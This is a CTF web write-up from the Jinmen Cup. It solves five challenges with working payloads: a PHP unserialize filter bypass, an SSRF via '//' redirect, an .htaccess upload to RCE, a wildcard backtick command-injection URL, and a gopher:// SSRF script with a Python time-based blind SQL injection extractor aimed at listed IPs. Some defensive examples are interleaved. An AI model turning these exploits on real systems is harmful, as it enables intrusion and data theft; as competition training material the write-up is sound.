津门杯 (Jinmen Cup) – WEB Write-Up


WEB

power_cut

The source was obtained from the index.php.swp backup (a Vim swap file):

<?php
class logger{
    public $logFile;
    public $initMsg;
    public $exitMsg;
    function __construct($file){
        // initialise variables
        $this->initMsg="#--session started--#\n";
        $this->exitMsg="#--session end--#\n";
        $this->logFile =  $file;
        readfile($this->logFile);   // sink: the file at an attacker-chosen path is written straight into the response
    }
    function log($msg){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$msg."\n");
        fclose($fd);
    }
    function __destruct(){
        echo "this is destruct";
    }
}
class weblog {
    public $weblogfile;
    function __construct() {
        $flag="system('cat /flag')";
        echo "$flag";               // red herring: echoes the string literal, never executes it
    }
    function __wakeup(){
        // self::waf($this->filepath);   // the waf is never applied to the deserialized value
        $obj = new logger($this->weblogfile);   // unserialize() -> __wakeup() -> logger::__construct() -> readfile()
    }
    public function waf($str){
        $str=preg_replace("/[<>*#'|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    function __destruct(){
        echo "this is destruct";
    }
}
$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);   // character blacklist, single pass
$log = str_replace('flag','',$log);              // keyword removal, also single pass
$log_unser = unserialize($log);                  // triggers weblog::__wakeup()
?>

A simple deserialization challenge. Both filters in index.php run in a single pass, so double-writing the stripped keyword gets around them: send flflagag, and the one str_replace removes the inner flag while the outer halves close up into flag again. The serialized string length must be the length after filtering (s:5 for /flag), because that is the string unserialize() actually sees.

<?php
class weblog {
    public $weblogfile='/flag';
}
$a = new weblog();
// serialize the real path first so the s:5 length matches what the server sees
// after its filter, then double-write the keyword that str_replace strips
echo str_replace('flag', 'flflagag', serialize($a));
?>
//O:6:"weblog":1:{s:10:"weblogfile";s:5:"/flflagag";}
//response: flag{EfuteB3QOqvRqD099mHuDRJKWRxnAC47} followed by the "this is destruct" echoes from the destructors
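To check the double-write trick without touching the target, here is an added example (not the write-up's own tooling) that builds the payload and runs it through a re-implementation of the two filters in index.php, then applies the same length check PHP's unserialize() performs. The class/property names come from the challenge source; the parser is a deliberately narrow stand-in for unserialize(), an assumption of this example.

```python
import re


def server_filter(s):
    """The two single-pass filters from index.php: strip the blacklisted
    characters, then remove each literal 'flag' once (no re-scan)."""
    s = re.sub(r"[<>*#'|?\n ]", "", s)
    return s.replace("flag", "")


def double_write(s, word="flag"):
    """Replace each occurrence of `word` with the word split around a copy of
    itself (flag -> flflagag).  One pass of str_replace removes the inner copy
    and the outer halves rejoin into the original word."""
    half = len(word) // 2
    return s.replace(word, word[:half] + word + word[half:])


def build_payload(path):
    """Serialize weblog{weblogfile: path}.  The s:N length must count the path
    AFTER the filter, since unserialize() runs on the filtered string, so
    serialize the real path first and only then double-write the keyword."""
    serialized = f'O:6:"weblog":1:{{s:10:"weblogfile";s:{len(path)}:"{path}";}}'
    return double_write(serialized)


def parse_weblogfile(serialized):
    """Narrow stand-in for unserialize() (assumption: only this one object
    shape).  Returns the weblogfile value, or None when the declared length
    does not match the string, which is where PHP would reject the input."""
    m = re.fullmatch(r'O:6:"weblog":1:\{s:10:"weblogfile";s:(\d+):"(.*)";\}', serialized)
    if not m or int(m.group(1)) != len(m.group(2)):
        return None
    return m.group(2)


if __name__ == "__main__":
    p = build_payload("/flag")
    print("send:    ", p)
    print("filtered:", server_filter(p))
    print("readfile:", parse_weblogfile(server_filter(p)))
```

Note that parse_weblogfile(build_payload("/flag")) is None: the unfiltered payload is intentionally invalid serialization, which is why the length field has to be computed from the post-filter string.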

[screenshot]

GoOSS

The source shows a PHP application listening on port 80 on the internal network, so this is an SSRF challenge.

[screenshot]

Auditing the Go code shows that the SSRF can be completed through a 302 redirect.

[screenshot]

That branch requires IsDir() to return true.

Running the environment locally, appending a few /.. segments to the end of the path is enough to trigger the 302.

A gin-gonic/gin quirk: a double slash // is enough to trigger the SSRF (a Location header that begins with // is resolved as a scheme-relative URL, so the client follows it to whatever host is named after the slashes). Combining the two, the payload is as follows:

[screenshot: final payload]
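The reason the // redirect reaches another host is that redirect-following clients resolve the Location header as a URL reference, not as a path. The added example below (my code, not from the write-up or the GoOSS source) contrasts the kind of "starts with /" check that the trick slips past with resolving the reference first and comparing origins; the host names and paths are assumed.

```python
from urllib.parse import urljoin, urlsplit


def naive_is_same_host(location):
    """The kind of check the // trick defeats: a Location that starts with "/"
    and carries no "://" looks like a path on the current host."""
    return location.startswith("/") and "://" not in location


def resolve_location(request_url, location):
    """What a redirect-following client actually requests next: RFC 3986
    reference resolution, which treats "//host/path" as scheme-relative (the
    scheme is inherited, the host is replaced) and removes /.. dot segments."""
    return urljoin(request_url, location)


def redirect_leaves_host(request_url, location):
    """Compare the origin before and after resolution, never the raw header."""
    before = urlsplit(request_url)
    after = urlsplit(resolve_location(request_url, location))
    return (after.scheme, after.hostname, after.port) != (
        before.scheme, before.hostname, before.port)


if __name__ == "__main__":
    # assumed service URL and an internal target, for illustration only
    base = "http://gooss.example:8080/files/x"
    for loc in ["/files/x/", "//127.0.0.1/admin.php", "../../admin.php"]:
        print(f"{loc!r:28} naive-ok={naive_is_same_host(loc)!s:5} "
              f"-> {resolve_location(base, loc)}  leaves-host={redirect_leaves_host(base, loc)}")
```

The practical rule for a fetcher that follows redirects: re-run the destination allow-list on every hop, on the resolved absolute URL.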

UploadHub

The challenge author's if check seems to be wrong (or perhaps deliberately so): arbitrary files can be uploaded.

Looking at apache2.conf:

[screenshot: apache2.conf]

At the configuration level, PHP parsing is disabled for the upload sandbox directory.

Apache merges <Directory> sections and .htaccess files together (shortest path first), and a .htaccess, where AllowOverride permits it, overrides the <Directory> block for the same directory; <Files> sections are merged after that and override both. So this challenge is about exploiting .htaccess.

Testing confirms that a <Files> section takes precedence over a <Directory> section.

[screenshot]

Upload the .htaccess to get RCE, then bypass disable_functions.

flag{BNjmiWsBgTW4fsLoDgWLvgnfqk1CI3Nx}
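As an added illustration (not the challenge's real apache2.conf, which only survives in the screenshot), here is a directory-level PHP disable that an uploaded .htaccess can undo, next to a form that it cannot. Paths, file names and the exact directives are assumed.

```apache
# Constructed example. Bypassable form: php_flag is an ordinary directive, so a
# .htaccess in the directory may set it back as long as AllowOverride permits it.
<Directory /var/www/html/upload>
    php_flag engine off
    AllowOverride All
</Directory>

# What an uploaded .htaccess in that directory can then do. A <Files> section is
# merged after <Directory>, so it wins for the named file (hypothetical contents):
#
#   <Files "shell.png">
#       php_flag engine on
#       SetHandler application/x-httpd-php
#   </Files>

# Hardened form: php_admin_flag can only appear in the server or vhost config and
# cannot be overridden from .htaccess or ini_set(); AllowOverride None makes Apache
# ignore .htaccess files in the directory altogether.
<Directory /var/www/html/upload>
    php_admin_flag engine off
    AllowOverride None
</Directory>
```

Which of the two the target used is not visible here; the point of the exercise is that the overridable one is what makes the .htaccess upload meaningful.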

hate_php

http://122.112.214.101:20004/?code=?%3E%3C?=`/???/???%20/*`?%3E

URL-decoded the parameter is ?><?=`/???/??? /*`?> : the ?> closes the PHP context the input lands in, <?= reopens it as a short echo tag, the backtick operator runs the string in a shell, and the shell expands the globs, /???/??? matching /bin/cat (among other three-character names) and /* matching every entry in the root directory, /flag included. Nothing in the payload is a letter or digit, so a blacklist on those does not catch it.
#   flag{h76ghpt2v2JiYEKzBQ5ysxu9b2Z3mN4A}

[screenshot]

easysql

SSRF to admin.php on localhost.

Time-based injection through a POST request smuggled over gopher://; there is no filtering at all. The helper below turns one SQL expression into the double-encoded gopher URL:

<?php
// Usage: php gopher.php '<sql expression>'  -> prints the value for ?url=
$payload = "poc=" . $argv[1];
//$payload = "poc=if((select ascii(substr(database(),1,1)))=115,sleep(0.4),1)";
// HTTP needs CRLF line endings and an empty line between the headers and the body
$test = "POST /admin.php HTTP/1.1\r\n"
      . "Content-Type: application/x-www-form-urlencoded\r\n"
      . "X-Forwarded-For: 127.0.0.1\r\n"
      . "cache-control: no-cache\r\n"
      . "Postman-Token: 375ba985-8106-4d79-bafd-dff6654589b8\r\n"
      . "User-Agent: PostmanRuntime/7.6.0\r\n"
      . "Accept: */*\r\n"
      . "Host: 127.0.0.1\r\n"
      . "Content-Length: " . strlen($payload) . "\r\n"
      . "Connection: close\r\n"
      . "\r\n"
      . $payload . "\r\n";
// gopher writes everything after "_" to the socket verbatim; encode once for the
// gopher URL and once more because the whole thing travels inside ?url=
echo urlencode("gopher://127.0.0.1:80/_" . rawurlencode($test));

The Python driver does a binary search on each character's ASCII value, using the response time as the oracle:

import subprocess
import time
import requests

url = 'http://121.36.147.29:20001/?url='
s = requests.Session()
x = ""


def slower_than(payload, threshold=2):
    """Send one time-based probe through the SSRF and report whether it hit the sleep."""
    # build the double-encoded gopher:// URL with the PHP helper above; passing
    # argv as a list avoids shell-quoting the ( ) > , in the payload
    tmp_r = subprocess.run(['php', '/Users/ha1c9on/Web/HISTORY/gopher.php', payload],
                           capture_output=True, text=True).stdout.strip()
    tmp_url = url + tmp_r
    print(tmp_url)
    before_time = time.time()
    s.get(tmp_url)
    # 2 s is the threshold that worked against this target with sleep(0.2)
    return time.time() - before_time > threshold


for Len in range(1, 50):
    # binary search on ascii(substr(flag, Len, 1)); MySQL's ascii('') is 0 past the end
    hi = 127
    lo = 0
    while hi > lo:
        mid = (hi + lo) // 2
        payload = 'if((select ascii(substr((select flag from flag),{},1)))>{},sleep(0.2),1)'.format(Len, mid)
        print(payload)
        if slower_than(payload):
            lo = mid + 1
        else:
            hi = mid
    if lo == 0:
        break          # end of the string
    x += chr(lo)
    print("success:{} length:{}".format(x, len(x)))
#flag{VqvjbS1O8A1gVWa2aPF44ruiELruVDP1}

[screenshot]
